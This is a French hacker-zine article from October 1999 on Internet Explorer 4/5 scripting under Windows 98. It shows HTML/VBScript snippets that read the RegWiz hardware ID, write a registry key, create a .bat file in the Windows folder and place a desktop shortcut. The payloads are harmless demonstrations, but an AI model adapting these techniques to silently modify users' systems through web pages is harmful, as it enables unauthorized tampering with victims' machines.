


        ,,`,,,,`,,`,,`,,
                                                                                   
          ****     *******     ****  **********  *****   **        *****     ****  
           ****   **** ****   ****       **      *** **  **       *     *   *    * 
            **** ****   **** ****        **      ***  ** **       *     *   *    * 
             *******     *******     **********  ***   ****        ******    *  *  
             ___________________________________________________        *    ****  
                                                                       *   *    * 
                Ecris par putois, Octobre 99                     *     *   *    * 
                                                                  ******    ****  
        ,,`,,`,,``,,`,,`,,

                                SPECIAL INTERNET EXPLORER 4/5
                                _____________________________


                INDEX:     1] Mouchard de windows 98
                           2] Ecrire dans la base de registre
                           3] Creer des fichiers
                           4] Creer un racourci vers le bureau


Tester sous win98 premiere edition (MAJ mise a jour),cliquez sur YES pour executer le script.

1] Windows 98 l'espion qui m'aimais
___________________________________

La presse en a fais tout un batage pour quelques infos pas terrible,ce fameux numeros HWID qui 
donnais le numeros d'identification de la machine ainsi que les donnees enregistrees que le reg
wizard envoyer sur regwic.msn.com.Le secret le voici:


-=-=-=-=-=-=-= snip snip snip snip =-=-=-=-=-=-=-=-=-=-= snip snip snip =-=-=-=-=-=-=-=-=-=-=-=-

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=windows-1252" http-equiv=Content-Type>
<SCRIPT langage="javascript">
<!--
//-->
</SCRIPT>

<META content="MSHTML 5.00.2314.1000" name=GENERATOR></HEAD>
<BODY aLink=#ff0000 bgColor=#ffffff link=#000080 text=#000000 vLink=#800080>
<OBJECT classid=clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00 height=0 id=RegWiz 
type=application/x-oleobject width=0></OBJECT>
<CENTER>
<TABLE border=1>
  <TBODY>
  <TR>
    <TH align=middle>Rsultat du test</TH></TR>
  <TR>
    <TD><NOSCRIPT></NOSCRIPT>
      <SCRIPT>
flag = false;
if(navigator.appName != "Microsoft Internet Explorer" || typeof(navigator.platform) == "undefined")
{
        document.writeln("Ce test exige que Internet Explorer 4 ou 5 soit votre navigateur !");
}
else if(navigator.platform != "Win32")
{
        document.writeln("Ce test doit &ecirc;tre r&eacute;alis&eacute; &agrave; partir de Windows !");
}
else if(typeof(document.RegWiz.HWID) == "undefined")
{
        document.writeln("Le contr&ocirc;le ActiveX RegWiz est seulement disponible sur les syst&egrave;mes Windows 98 ou 2000 !");
}
else
{
        flag = true;
        document.writeln("<code>");
        document.writeln("Votre ID Mat&eacute;riel est " + document.RegWiz.HWID);
        document.writeln("</code>");
        document.writeln("</td></tr>");
        document.writeln("<tr><td>");
        document.writeln("<code>");
        document.writeln("Votre ID Microsoft est " + document.RegWiz.MSID);
        document.writeln("</code>");
        document.writeln("<tr><td>");
        document.writeln("<code>");
      
}
</SCRIPT>
  </TR></TBODY></TABLE></FORM></CENTER><BR><BR>Pour l'enlever:<BR>regsvr32.exe -u 
c:\windows\system\regwizc.dll<BR>Vous devriez 
avoir:c:\windows\system\regwizc.dll succeded, si la dsinstallation a 
russi.<BR><BR>Et si vous tes mazo tapez:<BR>regsvr32.exe -c 
c:\windows\system\regwizc.dll;pour le reactiver<BR></BODY></HTML>

-=-=-=-=-=-=-= snip snip snip snip =-=-=-=-=-=-=-=-=-=-= snip snip snip =-=-=-=-=-=-=-=-=-=-=-=-
 
A tester donc sur les systeme windows 2000 et 98 mais bon perso je vois pas trop ce que l'on peut
faire avec ca.



2] Creer des fichiers dans la base de registre via internet, possible?
______________________________________________________________________


Il est vrai qu'il a etait annonce a plusieur reprise la presence de virus sur le web mais on a
jamais eu , une preuve reel de ces virus qui tournerai avec active X sous win98.
Voyons cela de plus pres.Il est bien evidement que le active x (pour le code presente ci dessous)

Internet explorer permet de se taper des delires etonants,on peut ecrire dans la base de registre
efface, meme creer des .bat ou se servir de debug.



2] Le secret qui ecris dans la base de registre:
________________________________________________


-=-=-=-=-=-=-= snip snip snip snip =-=-=-=-=-=-=-=-=-=-= snip snip snip =-=-=-=-=-=-=-=-=-=-=-=-
<html><body>
<script Language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\toto\With\Name", "it's a test"

</script>
</body>
</html>
-=-=-=-=-=-=-= snip snip snip snip =-=-=-=-=-=-=-=-=-=-= snip snip snip =-=-=-=-=-=-=-=-=-=-=-=-


3] La creation de fichier bat ou text 
_____________________________________

Eh oui c'est possible,le programme ci-dessous creer un fichier dans le repertoire de \windows\
du nom de toto.bat avec bonjour ecris dedans:


-=-=-=-=-=-=-= snip snip snip snip =-=-=-=-=-=-=-=-=-=-= snip snip snip =-=-=-=-=-=-=-=-=-=-=-=-
<html><body>
<script Language="VBScript">
 if location.protocol = "file:" then
        Set FSO = CreateObject("Scripting.FileSystemObject")
        HPath = Replace(location.href, "/", "\")
        HPath = Replace(HPath, "file:\\\", "")
        HPath = FSO.GetParentFolderName(HPath)
        Set TRange = document.body.createTextRange
Set BatFile = FSO.CreateTextFile("c:\Windows\toto.bat", 2, False)
        BatFile.WriteLine ""
        BatFile.WriteLine "bonjour"
BatFile.Close

end if
</script>
</body>
</html>
-=-=-=-=-=-=-= snip snip snip snip =-=-=-=-=-=-=-=-=-=-= snip snip snip =-=-=-=-=-=-=-=-=-=-=-=-


4] Creer des shourcuts
______________________

Un petit source sur le meme model precedent qui fais des racourcis dans c:\windows\bureau:

<html><body>
<script Language="VBScript">
 if location.protocol = "file:" then
        Set WshShell = CreateObject("WScript.Shell")
        Set FSO = CreateObject("Scripting.FileSystemObject")
        HPath = Replace(location.href, "/", "\")
        HPath = Replace(HPath, "file:\\\", "")
        HPath = FSO.GetParentFolderName(HPath)
        Set TRange = document.body.createTextRange

       Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\multimania.url")
        RealLink.TargetPath = "http://www.multimania.com/"
        RealLink.Save
end if
</script>
</body>
</html>

end of part 1 by putois ,  octobre 99


                        ***************************************************
                        ** Hi i have 22 yeard old and search a job thank **
                        ***************************************************

4180 bug for windows, 131 bug cgi, 2000 for unix, and ....

